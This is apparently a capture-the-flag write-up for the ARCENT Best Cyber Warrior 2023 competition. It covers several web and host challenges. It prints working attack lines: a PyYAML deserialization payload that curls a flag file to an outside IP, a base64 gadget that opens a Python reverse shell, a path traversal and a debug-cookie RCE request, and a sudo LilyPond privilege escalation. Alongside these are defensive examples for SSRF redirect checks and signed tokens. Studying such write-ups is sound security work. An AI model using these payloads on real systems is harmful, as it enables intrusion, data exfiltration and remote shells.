# ARCENT Best Cyber Warrior 2023

### CyberCompose

Unsafe YAML deserialization, the same bug class as Rapid7's [nodejs_js_yaml_load_code_exec](https://www.rapid7.com/db/modules/exploit/multi/fileformat/nodejs_js_yaml_load_code_exec/) module. The backend here parses YAML with an unsafe PyYAML loader (the payload relies on the PyYAML-specific `!!python/object/apply` tag), so a Python gadget is what works.

Payload (runs `curl` through `os.popen` and POSTs the flag file to the attacker's listener):

```yaml
!!python/object/apply:os.popen ['curl -X POST http://159.223.147.201/ --data "$(cat /app/RanDomflagN4m3.txt)"']
```

### Confuser

Vulnerable to <https://github.com/advisories/GHSA-ffqj-6fqr-9h24>

### Intruder

* Got SSRF using <https://blog.doyensec.com/2023/03/16/ssrf-remediation-bypass.html>
* It was a hassle setting up my own HTTPS server for it, and I couldn't use self-signed certs because the insecure option was not enabled on the vulnerable web server.
* Was able to get YAML deserialization working through the SSRF with this PHP redirect:

```php
<?php
// Redirect the SSRF fetch to the internal YAML endpoint; the base64 path segment decodes to a PyYAML !!python/object/new:Warning gadget (extend: !!python/name:exec) that runs a Python reverse-shell one-liner
header('Location: http://127.0.0.1:5000/yaml/ISFweXRob24vb2JqZWN0L25ldzpXYXJuaW5nCnN0YXRlOgogIGV4dGVuZDogISFweXRob24vbmFtZTpleGVjCmxpc3RpdGVtczogJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxNTkuMjIzLjE0Ny4yMDEiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc%3D'); ?>
```
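Why the redirect works: the server validated the URL it was given, found a public host, and then let its HTTP client follow the 302 to 127.0.0.1 without re-checking. The following is an added example, not the challenge's code or the Doyensec post's code, that reproduces that mistake beside the fix. The DNS table, the URL map that stands in for the network, and the hostnames/addresses in it are all constructed so the script runs offline.

```python
import ipaddress
from urllib.parse import urlparse, urljoin

# Constructed stand-in for DNS (hostname -> address). Real code resolves with
# socket.getaddrinfo() and must check every address that comes back.
FAKE_DNS = {
    "attacker.example": "93.184.216.34",   # globally routable, so the first hop passes the filter
    "localhost": "127.0.0.1",
}

# Constructed stand-in for the network: URL -> (status, headers, body).
# The first entry plays the role of the PHP redirector above.
FAKE_WEB = {
    "http://attacker.example/redir.php": (302, {"Location": "http://127.0.0.1:5000/yaml/payload"}, b""),
    "http://attacker.example/page": (200, {}, b"harmless public page"),
    "http://127.0.0.1:5000/yaml/payload": (200, {}, b"internal yaml endpoint reached"),
}

REDIRECT_CODES = {301, 302, 303, 307, 308}


def fake_get(url):
    """Fetch a URL from the constructed map instead of the real network."""
    return FAKE_WEB.get(url, (404, {}, b""))


def resolve(host):
    """Return the address a host resolves to; literal IPs resolve to themselves."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        if host not in FAKE_DNS:
            raise ValueError(f"cannot resolve {host}")
        return ipaddress.ip_address(FAKE_DNS[host])


def is_allowed(url):
    """Allow only http(s) URLs whose host resolves to a globally routable address."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    return resolve(parts.hostname).is_global


def fetch_naive(url, max_redirects=5):
    """Vulnerable: validates only the user-supplied URL, then follows redirects blindly."""
    if not is_allowed(url):
        raise PermissionError(f"blocked: {url}")
    for _ in range(max_redirects + 1):
        status, headers, body = fake_get(url)
        if status in REDIRECT_CODES and "Location" in headers:
            url = urljoin(url, headers["Location"])   # no re-check here: this is the bug
            continue
        return status, body
    raise RuntimeError("too many redirects")


def fetch_hardened(url, max_redirects=5):
    """Fixed: every hop, including each redirect target, must pass the filter."""
    for _ in range(max_redirects + 1):
        if not is_allowed(url):
            raise PermissionError(f"blocked: {url}")
        status, headers, body = fake_get(url)
        if status in REDIRECT_CODES and "Location" in headers:
            url = urljoin(url, headers["Location"])
            continue
        return status, body
    raise RuntimeError("too many redirects")


if __name__ == "__main__":
    print(fetch_naive("http://attacker.example/redir.php"))      # reaches 127.0.0.1:5000
    try:
        fetch_hardened("http://attacker.example/redir.php")
    except PermissionError as e:
        print(e)                                                  # blocked at the redirect hop
```

Checking each hop is necessary but not sufficient: the address is looked up once for the check and again by the HTTP client when it connects, so a rebinding DNS name can still slip through. A production fix either connects to the address that was checked (pinning it) or disables redirect following in the client and treats a 3xx as a failed fetch.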

### S7R34M5

```python
from scapy.all import IP, UDP, Raw, rdpcap
import sys

# Take the pcap file name from the first argument
file = sys.argv[1]

# Define the source and destination IP addresses of the stream to reassemble
source_ip = "192.168.245.129"
destination_ip = "192.168.1.7"

# Array to collect the UDP payload bytes in capture order
data_array = []

packets = rdpcap(file)

def process_packet(packet):
    # Keep the payload of every UDP packet from source_ip to destination_ip;
    # packets with no Raw layer (no payload) are skipped instead of crashing
    if (packet.haslayer(IP) and packet.haslayer(UDP) and packet.haslayer(Raw)
            and packet[IP].src == source_ip and packet[IP].dst == destination_ip):
        data_array.append(bytes(packet[Raw].load))

# Process each packet in the pcap file
for packet in packets:
    process_packet(packet)

# Merge the payloads and print them; undecodable bytes are replaced rather than raising
data = b''.join(data_array)
print(data.decode('utf-8', errors='replace'))
```

### LeakyPond

#### Initial Access

Path traversal: `/vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../var/www/html/debugger_infra-temp.php`

The debugger file read through the traversal was still enabled: with `debug_infra=1` in the query string it passes the value of the `debug` cookie straight to `system()`.

RCE:

```http
GET /index.php?debug_infra=1 HTTP/1.1
Host: wcom5p6v45jax3g1w93xkxdt7vr86dv91gp0c43l-web.cybertalentslabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: debug=ls
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
X-PwnFox-Color: blue
```

Used Ivan Sincek's PHP reverse shell for a more stable environment.

#### Priv Esc

`sudo` allowed running `/opt/lilypond/bin/lilypond` as root. LilyPond embeds a Guile Scheme interpreter and evaluates `#(...)` blocks in a `.ly` file at compile time, so the base64 below decodes to a `.ly` file whose Scheme calls `(system "cat /root/flag* > /tmp/flagz")`, copying the flag out with root privileges.

```
$ echo "JSBjb21iaW5lcyBzaGVsbCBleGVjdXRpb24gd2l0aCBmaWxlIHJlYWRpbmcKJSB0byBnZXQgc29tZXRoaW5nIGxpa2UgYW4gaW50ZXJhY3RpdmUgc2hlbGwKIyhkZWZpbmUgcyAiIikKIyhzeXN0ZW0gImNhdCAvcm9vdC9mbGFnKiA+IC90bXAvZmxhZ3oiKQojKGxldCogICgoZiAob3Blbi1pbnB1dC1maWxlICIvdG1wL3F3ZXJ0eWFzZGYiKSkKICAgICAgICAoYyAjXHNwYWNlKSkKICAod2hpbGUgKG5vdCAoZW9mLW9iamVjdD8gYykpCiAgKHNldCEgcyAoc3RyaW5nLWFwcGVuZCBzIChzdHJpbmcgYykpKQogIChzZXQhIGMgKHJlYWQtY2hhciBmKSkpKQpcbmV3IFN0YWZmIDw8e2deI3MKfT4+" | base64 -d > test.ly
$ sudo /opt/lilypond/bin/lilypond test.ly
Processing `test.ly'
Parsing...
test.ly:1: warning: no \version statement found, please add

\version "2.23.82"

for future compatibility
Interpreting music...
Preprocessing graphical objects...
Finding the ideal number of pages...
Fitting music on 1 page...
Drawing systems...
Converting to `test.pdf'...
Success: compilation successfully completed
$ ls
flagz
qwertyasdf
test.ly
test.pdf
$ cat flagz
flag{ZAE324RTHJNBVCXWQZ34568UHBVCX}
$
```

### SayingPlease

Simply change the base64 encoded authentication token from user to admin and the index.php page will display the flag.
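The bug is a role claim that the server trusts without any integrity check, so the client can rewrite it. The following is an added example, not the challenge's code: it assumes a base64-encoded JSON token with a `role` claim and a server-side HMAC key (both constructed for illustration) and shows the tamper step next to a signed token that rejects it.

```python
import base64
import hashlib
import hmac
import json

# Constructed server-side secret; the vulnerable design has no secret at all.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


# --- vulnerable: base64 is encoding, not authentication ---------------------

def make_unsigned_token(role):
    """What the challenge handed out: base64 of the claims, nothing else."""
    return base64.b64encode(json.dumps({"role": role}).encode()).decode()


def role_from_unsigned_token(token):
    """Server side: trusts whatever the client sends. This is the bug."""
    return json.loads(base64.b64decode(token))["role"]


def tamper(token, new_role):
    """Attacker side: decode, edit the role, re-encode. No secret needed."""
    claims = json.loads(base64.b64decode(token))
    claims["role"] = new_role
    return base64.b64encode(json.dumps(claims).encode()).decode()


# --- hardened: HMAC over the claims, verified before the claims are used ----

def make_signed_token(role):
    """payload.mac, where mac = HMAC-SHA256(SERVER_KEY, payload)."""
    payload = base64.urlsafe_b64encode(json.dumps({"role": role}).encode())
    mac = hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()
    return payload.decode() + "." + mac


def role_from_signed_token(token):
    """Return the role only if the MAC verifies; None for anything tampered or malformed."""
    try:
        payload, mac = token.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):   # constant-time comparison
        return None
    return json.loads(base64.urlsafe_b64decode(payload))["role"]


def tamper_signed(token, new_role):
    """Same edit against the signed token; the old MAC no longer matches."""
    payload, mac = token.rsplit(".", 1)
    claims = json.loads(base64.urlsafe_b64decode(payload))
    claims["role"] = new_role
    return base64.urlsafe_b64encode(json.dumps(claims).encode()).decode() + "." + mac


if __name__ == "__main__":
    weak = make_unsigned_token("user")
    print(role_from_unsigned_token(tamper(weak, "admin")))      # admin: the page's flag path
    strong = make_signed_token("user")
    print(role_from_signed_token(tamper_signed(strong, "admin")))  # None: rejected
```

The signed variant still carries the role in cleartext, which is fine; what matters is that the server derives the role from a value it can verify. A session ID looked up server-side removes the claim from the client entirely and is the simpler choice when you control both ends.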

